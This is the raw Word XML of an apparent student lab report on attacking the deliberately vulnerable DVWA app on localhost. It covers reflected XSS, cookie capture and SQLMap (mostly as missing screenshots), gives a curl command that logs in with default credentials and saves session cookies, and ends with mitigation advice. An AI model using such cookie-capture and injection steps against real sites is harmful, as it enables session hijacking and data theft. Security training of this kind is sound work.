    <w:p w:rsidR="00602FA4" w:rsidRDefault="00602FA4" w:rsidP="009655B0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009655B0" w:rsidRPr="00454180" w:rsidRDefault="00454180" w:rsidP="009655B0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Creating database: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00454180" w:rsidRPr="00454180" w:rsidRDefault="00454180" w:rsidP="009655B0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="291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rsidR="00454180" w:rsidRPr="00454180" w:rsidRDefault="00454180" w:rsidP="009655B0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00454180" w:rsidRPr="00454180" w:rsidRDefault="00454180">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00454180" w:rsidRPr="00454180" w:rsidRDefault="00454180" w:rsidP="009655B0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS reflected: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00454180" w:rsidRPr="00454180" w:rsidRDefault="00454180" w:rsidP="009655B0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00454180" w:rsidRPr="00454180" w:rsidRDefault="00454180" w:rsidP="009655B0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="2927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rsidR="00602FA4" w:rsidRDefault="00602FA4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00454180" w:rsidRPr="00454180" w:rsidRDefault="00454180" w:rsidP="009655B0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00454180" w:rsidRPr="00454180" w:rsidRDefault="00454180" w:rsidP="009655B0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Cookie capturing using:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00454180" w:rsidRPr="00454180" w:rsidRDefault="00454180" w:rsidP="009655B0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="2927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rsidR="00454180" w:rsidRPr="00454180" w:rsidRDefault="00454180">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00454180" w:rsidRPr="00454180" w:rsidRDefault="00454180" w:rsidP="009655B0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Using SQLMap too: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00454180" w:rsidRPr="00454180" w:rsidRDefault="00454180" w:rsidP="009655B0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00454180" w:rsidRPr="00454180" w:rsidRDefault="00454180" w:rsidP="009655B0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="2919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rsidR="00454180" w:rsidRPr="00454180" w:rsidRDefault="00454180" w:rsidP="009655B0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943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rsidR="00454180" w:rsidRPr="00454180" w:rsidRDefault="00454180" w:rsidP="009655B0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="2919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rsidR="00454180" w:rsidRDefault="00454180" w:rsidP="009655B0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="2919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rsidR="00AB3FC2" w:rsidRDefault="00AB3FC2" w:rsidP="009655B0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AB3FC2" w:rsidRDefault="00AB3FC2" w:rsidP="00AB3FC2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc195990387"/>
      <w:r w:rsidRPr="00AB3FC2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Alternative ways:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w:rsidR="00AB3FC2" w:rsidRPr="00AB3FC2" w:rsidRDefault="00AB3FC2" w:rsidP="00AB3FC2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AB3FC2" w:rsidRPr="00AB3FC2" w:rsidRDefault="00AB3FC2" w:rsidP="00AB3FC2">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB3FC2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>To get the cookies from the website we can also use “curl” method :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB3FC2" w:rsidRPr="00AB3FC2" w:rsidRDefault="00AB3FC2" w:rsidP="00AB3FC2">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AB3FC2" w:rsidRPr="00AB3FC2" w:rsidRDefault="00AB3FC2" w:rsidP="00AB3FC2">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB3FC2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>curl -c cookies.txt -d "username=admin&amp;password=password&amp;Login=Login"http://localhost/dvwa/login.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB3FC2" w:rsidRPr="00AB3FC2" w:rsidRDefault="00AB3FC2" w:rsidP="00AB3FC2">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AB3FC2" w:rsidRPr="00AB3FC2" w:rsidRDefault="00AB3FC2" w:rsidP="00AB3FC2">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB3FC2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>from this we are able to store the cookies of this website in a cookies.txt file, we can acquire it by:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB3FC2" w:rsidRPr="00AB3FC2" w:rsidRDefault="00AB3FC2" w:rsidP="00AB3FC2">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2880" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB3FC2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>cat cookies.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB3FC2" w:rsidRPr="00AB3FC2" w:rsidRDefault="00AB3FC2" w:rsidP="00AB3FC2">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="3600" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB3FC2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>(or)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB3FC2" w:rsidRPr="00AB3FC2" w:rsidRDefault="00AB3FC2" w:rsidP="00AB3FC2">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2880" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB3FC2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>nano cookies.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB3FC2" w:rsidRDefault="00AB3FC2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc195990388"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1BEB" w:rsidRPr="00454180" w:rsidRDefault="00EB1BEB" w:rsidP="00D9326A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Mitigation Techniques</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w:rsidR="00AB3FC2" w:rsidRPr="00AB3FC2" w:rsidRDefault="00EB1BEB" w:rsidP="00D9326A">
      <w:pPr>
        <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>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To defend against SQL injection and session hijacking, the following security best practices should be implemented:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB3FC2" w:rsidRDefault="00EB1BEB" w:rsidP="00AB3FC2">
      <w:pPr>
        <w:spacing w:before="280" w:after="240" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360" w:hanging="360"/>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Input Validation and Query Handling:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1BEB" w:rsidRPr="00454180" w:rsidRDefault="00EB1BEB" w:rsidP="00AB3FC2">
      <w:pPr>
        <w:spacing w:before="280" w:after="240" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360" w:hanging="360"/>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Use prepared statements with parameterized queries (PDO, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>mysqli</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>, etc.).</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8"/>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Validate and sanitize all user inputs using whitelists.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8"/>
        </w:numPr>
        <w:spacing w:after="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Avoid dynamic SQL queries that concatenate user input.</w:t>
      </w:r>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1BEB" w:rsidRPr="00454180" w:rsidRDefault="00EB1BEB" w:rsidP="00D9326A">
      <w:pPr>
        <w:spacing w:before="280" w:after="240" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360" w:hanging="360"/>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Secure Session Management:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1BEB" w:rsidRPr="00454180" w:rsidRDefault="00EB1BEB" w:rsidP="0046636F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>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 xml:space="preserve">Enable </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Secure flags on cookies.</w:t>
      </w:r>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1BEB" w:rsidRPr="00454180" w:rsidRDefault="00EB1BEB" w:rsidP="0046636F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>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Regenerate session IDs after login.</w:t>
      </w:r>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D23D7F" w:rsidRPr="00AB3FC2" w:rsidRDefault="00EB1BEB" w:rsidP="009655B0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="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Implement proper session expiration and logout mechanisms.</w:t>
      </w:r>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1BEB" w:rsidRPr="00454180" w:rsidRDefault="00EB1BEB" w:rsidP="00D9326A">
      <w:pPr>
        <w:spacing w:before="240" w:after="80" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1BEB" w:rsidRPr="00454180" w:rsidRDefault="00EB1BEB" w:rsidP="00D9326A">
      <w:pPr>
        <w:spacing w:before="24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This project illustrates how a combination of weak input validation, insecure configuration, and improper session handling can lead to a complete compromise of a database. By leveraging tools like SQLMap and environments like DVWA, attackers can automate the process of extracting sensitive data with minimal effort.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1BEB" w:rsidRPr="00454180" w:rsidRDefault="00EB1BEB" w:rsidP="00D9326A">
      <w:pPr>
        <w:spacing w:before="24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The exploitation chain — from an XSS attack to SQL injection — highlights the importance of end-to-end application security. Developers must adopt secure coding practices, while system administrators should enforce strict configurations and monitor logs for suspicious activities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1BEB" w:rsidRPr="00454180" w:rsidRDefault="00EB1BEB" w:rsidP="00D9326A">
      <w:pPr>
        <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Cybersecurity is not a one-time task but a continuous effort that requires collaboration between developers, testers, and security professionals.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1BEB" w:rsidRPr="00454180" w:rsidRDefault="00E343D5" w:rsidP="00D9326A">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:pict>
          <v:rect id="_x0000_i1312" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1BEB" w:rsidRPr="00454180" w:rsidRDefault="00EB1BEB" w:rsidP="00D9326A">
      <w:pPr>
        <w:spacing w:before="240" w:after="80" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1BEB" w:rsidRPr="00454180" w:rsidRDefault="00EB1BEB" w:rsidP="0046636F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:before="240"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DVWA Project -</w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidR="00D9326A" w:rsidRPr="00454180">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
            <w:bCs/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-IN"/>
          </w:rPr>
          <w:t xml:space="preserve"> https://github.com/digininja/DVWA</w:t>
        </w:r>
        <w:r w:rsidR="00D9326A" w:rsidRPr="00454180">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
